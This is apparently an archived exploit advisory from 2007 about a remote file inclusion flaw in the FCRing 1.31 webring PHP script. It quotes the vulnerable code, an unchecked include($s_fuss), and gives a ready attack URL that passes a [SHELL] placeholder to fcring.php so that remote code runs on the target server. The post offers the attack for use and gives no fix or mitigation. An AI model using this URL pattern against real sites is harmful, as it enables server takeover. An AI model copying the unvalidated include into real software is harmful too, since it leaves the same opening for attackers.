id: 1535
date: 02/23/2007
title: FCRing <= 1.31 (fcring.php s_fuss) Remote File Include Vulnerability
author: kezzap66345
cves: 

====================================================================
FCRing <= 1.31 (fcring.php s_fuss) Remote File Include Vulnerability
====================================================================




FCRing 1.3 Webringskript

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3
*****************

ERROR:


 if($s_fuss != "")
  include($s_fuss);      <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path/fcring.php?s_fuss=[SHELL]


******thanx=x0r0n*shika********************************************************



#  0day.today [2023-03-22]  #